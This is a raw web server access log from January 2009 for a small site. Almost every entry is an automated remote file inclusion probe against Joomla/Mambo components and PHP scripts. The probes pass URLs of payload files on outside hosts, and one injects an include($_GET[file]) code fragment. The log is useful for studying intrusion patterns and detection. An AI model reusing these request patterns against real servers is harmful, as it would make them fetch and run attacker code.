64.118.85.149 - - [06/Jan/2009:05:20:25 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
85.214.51.146 - - [06/Jan/2009:05:20:36 -0800] "GET /logs/access_081226.log/errors.php?error=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
89.149.209.64 - - [06/Jan/2009:05:20:37 -0800] "GET /logs/access_081207.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.web20milliondollarhomepage.com"
113.30.66.5 - - [06/Jan/2009:05:20:41 -0800] "GET /logs/access_081207.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.web20milliondollarhomepage.com"
77.74.198.93 - - [06/Jan/2009:05:20:55 -0800] "GET /logs/access_081207.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:20:57 -0800] "GET /logs/access_081204.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:20:57 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:20:57 -0800] "GET /lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:20:58 -0800] "GET /logs/access_081118.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:21:00 -0800] "GET /logs/access_081118.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:05:21:34 -0800] "GET /logs/access_081207.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:05:21:34 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:05:21:41 -0800] "GET /logs/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:05:21:49 -0800] "GET /logs/access_081214.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:22:12 -0800] "GET /lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:22:12 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:22:12 -0800] "GET /logs/access_081204.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:05:22:31 -0800] "GET /logs/access_081214.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
66.172.9.3 - - [06/Jan/2009:05:22:33 -0800] "GET /logs/access_081207.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:05:22:44 -0800] "GET /logs/access_081214.log/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
85.214.51.146 - - [06/Jan/2009:05:23:08 -0800] "GET /logs/access_081226.log/errors.php?error=http://www.giovaniemissione.it/media/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:23:32 -0800] "GET /logs/access_081204.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:23:32 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:23:34 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:23:35 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
84.19.190.18 - - [06/Jan/2009:05:24:02 -0800] "GET /logs/access_081207.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:24:03 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.web20milliondollarhomepage.com"
66.172.9.3 - - [06/Jan/2009:05:24:19 -0800] "GET /logs/access_081103.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.web20milliondollarhomepage.com"
66.172.9.3 - - [06/Jan/2009:05:24:19 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.web20milliondollarhomepage.com"
66.172.9.3 - - [06/Jan/2009:05:24:20 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:24:20 -0800] "GET /logs/access_081103.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:24:20 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:24:21 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:24:35 -0800] "GET /logs/access_081204.log///lostpasswd.php?env[include_prefix]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
61.109.250.45 - - [06/Jan/2009:05:24:38 -0800] "GET /logs/access_081207.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://geocities.com/kombinasi2000/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:24:38 -0800] "GET //lostpasswd.php?env[include_prefix]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
61.109.250.45 - - [06/Jan/2009:05:24:38 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://geocities.com/kombinasi2000/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
61.109.250.45 - - [06/Jan/2009:05:24:38 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://geocities.com/kombinasi2000/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
200.101.192.223 - - [06/Jan/2009:05:24:53 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://secure.burtonhosting.com/billing//include/reports/include/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.web20milliondollarhomepage.com"
200.101.192.223 - - [06/Jan/2009:05:24:54 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://secure.burtonhosting.com/billing//include/reports/include/12-cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.web20milliondollarhomepage.com"
66.172.9.3 - - [06/Jan/2009:05:25:50 -0800] "GET /logs/access_081207.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:25:54 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:25:54 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:25:54 -0800] "GET /logs/access_081224.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
89.36.165.22 - - [06/Jan/2009:05:26:02 -0800] "GET /logs/access_081208.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://kocmo.org.ua//templates/bacokid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.web20milliondollarhomepage.com"
67.18.151.242 - - [06/Jan/2009:05:26:05 -0800] "GET /logs/access_081207.log//administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.planetchat.altervista.org/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:26:51 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:26:53 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:26:55 -0800] "GET /logs/access_081208.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:26:55 -0800] "GET /phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:26:56 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
148.245.102.115 - - [06/Jan/2009:05:27:28 -0800] "GET /logs/access.log///lostpasswd.php?env[include_prefix]=http://www.geocities.com/sijabirong/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
69.72.187.58 - - [06/Jan/2009:05:27:36 -0800] "GET /logs/access_081207.log%20/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:05:27:39 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:05:27:40 -0800] "GET /logs/access_081204.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:05:27:40 -0800] "GET /lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
69.94.66.139 - - [06/Jan/2009:05:28:14 -0800] "GET /logs/access_081224.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.web20milliondollarhomepage.com"
69.94.66.139 - - [06/Jan/2009:05:28:14 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.web20milliondollarhomepage.com"
65.98.89.90 - - [06/Jan/2009:05:28:28 -0800] "GET /errors.php?error=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
65.98.89.90 - - [06/Jan/2009:05:28:28 -0800] "GET /logs/errors.php?error=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
65.98.89.90 - - [06/Jan/2009:05:28:28 -0800] "GET /logs/access.log/errors.php?error=http://www.rolandmatthews.org/gen/id.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
69.94.66.139 - - [06/Jan/2009:05:28:29 -0800] "GET /logs/access_081208.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.web20milliondollarhomepage.com"
64.118.85.149 - - [06/Jan/2009:05:28:31 -0800] "GET /logs/access_081207.log%20/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:28:33 -0800] "GET /errors.php?error=http://www.geilewelt.at/uplimg/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:05:28:44 -0800] "GET /logs/access.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
89.149.209.64 - - [06/Jan/2009:05:29:06 -0800] "GET /logs/access_081224.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.web20milliondollarhomepage.com"
91.121.162.129 - - [06/Jan/2009:05:29:09 -0800] "GET /logs/access.log/?INCLUDE_FOLDER=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
89.149.209.64 - - [06/Jan/2009:05:29:27 -0800] "GET /logs/access_081208.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.web20milliondollarhomepage.com"
74.6.18.249 - - [06/Jan/2009:05:29:39 -0800] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.web20milliondollarhomepage.com"
218.234.18.127 - - [06/Jan/2009:05:29:44 -0800] "GET /logs/access_081118.log/phphtml.php?htmlclass_path=http://www.kadin.or.id/safe1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.94.66.139 - - [06/Jan/2009:05:30:01 -0800] "GET /logs/access_081224.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.94.66.139 - - [06/Jan/2009:05:30:01 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.94.66.139 - - [06/Jan/2009:05:30:01 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
194.135.103.242 - - [06/Jan/2009:05:30:04 -0800] "GET /logs/access_081207.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.web20milliondollarhomepage.com"
72.52.215.115 - - [06/Jan/2009:05:30:12 -0800] "GET /logs/access_081207.log%20/index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://nshands.com/includes/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.web20milliondollarhomepage.com"
86.109.170.176 - - [06/Jan/2009:05:30:17 -0800] "GET /admin.lib.inc.php?site_path=http://turkglob.tu.funpic.org/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
69.94.66.139 - - [06/Jan/2009:05:30:31 -0800] "GET /logs/access_081208.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
91.121.162.129 - - [06/Jan/2009:05:30:32 -0800] "GET /logs/access_081224.log/?INCLUDE_FOLDER=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.web20milliondollarhomepage.com"
213.226.166.122 - - [06/Jan/2009:05:30:54 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
89.149.209.64 - - [06/Jan/2009:05:30:59 -0800] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.web20milliondollarhomepage.com"
69.94.66.139 - - [06/Jan/2009:05:31:07 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
77.74.198.93 - - [06/Jan/2009:05:31:31 -0800] "GET /logs/access_081224.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.web20milliondollarhomepage.com"
211.202.2.220 - - [06/Jan/2009:05:31:41 -0800] "GET /logs/access_081207.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://geocities.com/kombinasi2000/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
211.202.2.220 - - [06/Jan/2009:05:31:42 -0800] "GET /components/com_hashcash/server.php?mosConfig_absolute_path=http://geocities.com/kombinasi2000/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
211.202.2.220 - - [06/Jan/2009:05:31:42 -0800] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://geocities.com/kombinasi2000/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
77.74.198.93 - - [06/Jan/2009:05:31:43 -0800] "GET /logs/access_081208.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.gsbcleaning.be/poll/pollphp/textfile/templates/graphic/idf.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.web20milliondollarhomepage.com"
80.122.203.139 - - [06/Jan/2009:05:31:47 -0800] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
80.122.203.139 - - [06/Jan/2009:05:31:47 -0800] "GET /logs/access_081204.log//templates/mangobery/footer.sample.php?Site_Path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
80.122.203.139 - - [06/Jan/2009:05:31:47 -0800] "GET /templates/mangobery/footer.sample.php?Site_Path=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:32:13 -0800] "GET /logs/errors.php?error=http://www.geilewelt.at/uplimg/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
81.208.9.229 - - [06/Jan/2009:05:32:15 -0800] "GET /?page=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
81.208.9.229 - - [06/Jan/2009:05:32:15 -0800] "GET /logs/access_081204.log//?page=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
81.208.9.229 - - [06/Jan/2009:05:32:15 -0800] "GET /logs//?page=http://www.recantodossabidinhos.com.br//imagens/ctrl.txt????%0D?? HTTP/1.1" 200 1658 "-" "libwww-perl/5.803" "www.web20milliondollarhomepage.com"
64.22.82.135 - - [06/Jan/2009:05:32:19 -0800] "GET /errors.php?error=http://www.geilewelt.at/uplimg/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
200.49.188.178 - - [06/Jan/2009:05:32:26 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.web20milliondollarhomepage.com"
200.49.188.178 - - [06/Jan/2009:05:32:27 -0800] "GET /logs/access_081103.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.web20milliondollarhomepage.com"
200.49.188.178 - - [06/Jan/2009:05:32:27 -0800] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.web20milliondollarhomepage.com"
218.234.23.56 - - [06/Jan/2009:05:32:59 -0800] "GET /logs/access_081224.log/lostpasswd.php?env[include_prefix]=http://h1.ripway.com/kurbang/idV6.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.web20milliondollarhomepage.com"
